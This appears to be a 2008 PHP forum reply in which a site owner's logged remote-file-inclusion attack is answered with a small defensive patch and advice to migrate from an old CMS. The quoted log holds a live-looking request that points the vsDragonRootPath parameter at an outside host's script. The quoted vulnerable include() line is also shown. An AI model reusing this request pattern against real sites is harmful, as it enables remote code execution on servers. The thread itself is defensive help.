Posted by �lvaro G. Vicario on 02/02/08 13:14

*** salonowiec escribió/wrote (Sat, 2 Feb 2008 12:47:09 +0100):
> My admin notified me that my site is closed till the eror is removed. My CMS
> is PHPBlue Dragon (pretty old). The attack was like this (found in logs):
>
> d198-53-20-215.abhsia.telus.net kurpiel.pl -
> [01/Feb/2008:19:44:06 +0100] "GET
> /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://pcbcservice.com/all.txt?
> HTTP/1.1" 500 599 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
> .NET CLR 1.1.4322)"

You can insert this code on top of activecontent.php:

if( isset($_REQUEST['vsDragonRootPath']) ){
exit;
}

However, it's pretty likely that there're some other security holes like
this so I'd consider migranting to a newer CMS in the mid term.


> <?php
[...]
> include($vsDragonRootPath."public_includes/pub_moddata/activefile.".$phpExt);?>Can I - rather ignorant in php - modify the file to make it hackerresistant? Many thanks


--
-+ http://alvaro.es - Álvaro G. Vicario - Burgos, Spain
++ Mi sitio sobre programación web: http://bits.demogracia.com
+- Mi web de humor austrohúngaro: http://www.demogracia.com
--

• Next in forum: Re: Capturing Windows Login Name
• Prev in forum: Re: Hacker's attack, please help...
• Thread view: Re: Hacker's attack, please help...

[Reply to this message]